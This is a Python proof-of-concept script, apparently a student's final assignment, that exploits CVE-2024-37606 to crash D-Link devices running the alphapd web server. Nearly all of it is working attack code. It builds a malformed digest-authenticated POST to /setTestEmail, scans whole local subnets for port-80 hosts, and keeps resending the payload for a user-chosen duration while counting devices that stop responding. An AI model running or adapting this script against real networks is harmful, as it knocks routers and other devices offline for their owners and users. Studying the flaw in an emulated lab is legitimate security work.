README.md
Rendering markdown...
import socket
import concurrent.futures
import time
import os
import platform
import sys
import itertools
import subprocess
# ========== UI Stuff ==========
def clear():
os.system("cls" if os.name == "nt" else "clear")
def banner():
title = r"""
██╗████████╗██╗ ██╗██╗███████╗ █████╗ ██████╗ ██████╗ ██████╗
██║╚══██╔══╝██║ ██║██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗██╔═══██╗
██║ ██║ ██║ █╗ ██║██║ ███╔╝ ███████║██████╔╝██║ ██║██║ ██║
██║ ██║ ██║███╗██║██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║██║ ██║
██║ ██║ ╚███╔███╔╝██║███████╗██║ ██║██║ ██║██████╔╝╚██████╔╝
╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝
CVE-2024-37606 (DOS) • NOVI HOGESCHOOL EINDOPDRACHT
"""
print("\033[95m" + title + "\033[0m")
time.sleep(1)
# ========== PoC Payload ==========
def send_poc(ip):
poc = b"""POST /setTestEmail HTTP/1.1\r
Host: %s\r
Content-Length: 44\r
Authorization: Digest username="admin", realm="_00", nonce="fake", response="fake", cnonce="fake"\r
\r
""" % ip.encode()
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(2)
s.connect((ip, 80))
s.sendall(poc)
try:
s.recv(1024)
print(f"[+] {ip}: Responded to PoC (still alive 💡)")
return False
except socket.timeout:
print(f"[!] {ip}: No response after PoC (possible crash 💥)")
return True
except Exception:
return False
# ========== Port & Process Checking ==========
def is_http_open(ip):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((ip, 80))
return True
except:
return False
def check_local_alphapd():
try:
out = subprocess.check_output(['ps', 'aux'], text=True)
if 'alphapd' in out:
print("[*] Detected 'alphapd' running on local system.")
return True
except:
pass
return False
def check_qemu_env():
try:
with open("/proc/cpuinfo") as f:
cpuinfo = f.read()
if "QEMU" in cpuinfo or "Bochs" in cpuinfo or "TCG" in cpuinfo:
print("[*] Running inside QEMU or emulated env.")
return True
except:
pass
return False
# ========== Smart Network Scanner ==========
def scan_network():
found_hosts = []
# Check localhost first
print("[*] Checking localhost (127.0.0.1)...")
if is_http_open("127.0.0.1") or check_local_alphapd():
print("[+] Found service on 127.0.0.1 ✓")
found_hosts.append("127.0.0.1")
# Scan local network ranges
for subnet in ["192.168.0.", "192.168.1."]:
print(f"\n[*] Scanning subnet: {subnet}0/24")
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
futures = {executor.submit(is_http_open, f"{subnet}{i}"): f"{subnet}{i}" for i in range(1, 255)}
for future in concurrent.futures.as_completed(futures):
ip = futures[future]
if future.result():
print(f"[+] Found web interface on {ip}")
found_hosts.append(ip)
return found_hosts
# ========== Get Target Mode ==========
def get_targets():
print("\n[*] Select target mode:")
print("1. Target specific IP address(es)")
print("2. Scan local network for devices")
print("3. Target localhost (emulated device)")
choice = input("\nEnter choice (1-3): ")
if choice == "1":
targets = []
print("\nEnter IP addresses (one per line, empty line to finish):")
while True:
ip = input("> ")
if not ip:
break
if is_http_open(ip):
print(f"[+] Connection to {ip} successful ✓")
targets.append(ip)
else:
print(f"[-] Cannot connect to {ip} on port 80")
if not targets:
print("[-] No valid targets specified.")
sys.exit(0)
return targets
elif choice == "2":
return scan_network()
elif choice == "3":
if is_http_open("127.0.0.1") or check_local_alphapd():
print("[+] Found service on localhost ✓")
return ["127.0.0.1"]
else:
print("[-] No service detected on localhost")
sys.exit(0)
else:
print("[-] Invalid choice.")
sys.exit(1)
# ========== Main Runner ==========
if __name__ == "__main__":
clear()
banner()
if check_qemu_env():
print("⚠️ Emulated environment detected — targeting localhost is recommended.\n")
targets = get_targets()
if not targets:
print("\n[-] No D-Link services found.")
sys.exit(0)
try:
duration = int(input("\n⏱️ How many seconds do you want to run the attack for? "))
except:
print("Invalid input. Exiting.")
sys.exit(1)
print(f"\n[+] Launching full-auto PoC for {duration} seconds...\n")
start_time = time.time()
sent_count = 0
crashed_total = 0
while time.time() - start_time < duration:
seconds_left = int(duration - (time.time() - start_time))
print(f"\r[⏳] Time left: {seconds_left:3} sec | PoCs sent: {sent_count}", end="")
for ip in targets:
crashed = send_poc(ip)
sent_count += 1
if crashed:
crashed_total += 1
time.sleep(1)
print(f"\n\n✅ Attack completed.")
print(f"📦 Total PoCs sent: {sent_count}")
print(f"💥 Devices that stopped responding at some point: {crashed_total}")